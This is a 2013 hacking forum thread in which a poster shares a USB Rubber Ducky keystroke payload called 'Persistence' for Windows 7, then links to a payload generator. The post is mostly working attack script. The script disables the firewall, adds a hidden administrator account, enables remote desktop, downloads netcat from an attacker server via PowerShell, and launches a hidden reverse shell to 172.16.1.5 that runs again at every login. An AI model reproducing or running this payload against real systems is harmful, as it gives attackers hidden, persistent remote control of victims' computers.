skysploit Posted March 29, 2013 Share Posted March 29, 2013 (edited) Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it... Opens an admin command prompt Creates an admin user (default creds: hacker | mysecretpassword) Disables the windows firewall Enables remote desktop Enables remote assistance Hides the newly created admin account from the Windows Welcome Screen Creates a VBScript to run a hidden instance of Netcat Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop) Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start) Calls the VBScript to launch the hidden netcat shell Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs) So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend. ~skysploit DELAY 5000 ESCAPE DELAY 300 CONTROL ESCAPE DELAY 300 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW DELAY 300 ENTER DELAY 800 STRING netsh firewall set opmode disable ENTER DELAY 300 STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add ENTER DELAY 200 STRING y ENTER DELAY 400 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING copy con nc.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER STRING echo cmdow @ /hid >> nc.bat ENTER STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe'); ENTER STRING cscript nc.vbs ENTER STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\ ENTER STRING echo cmdow @ /hid >> persistence.bat ENTER STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat ENTER STRING exit ENTER Edited March 30, 2013 by skysploit Quote Link to comment Share on other sites More sharing options...
skysploit Posted March 30, 2013 Author Share Posted March 30, 2013 ~Persistence~ has been added to the Simple-Ducky Payload Generator. See the forum post below for a link to download :) ~skysploit http://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v14-international-key-mappingkali-linux-compatible/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.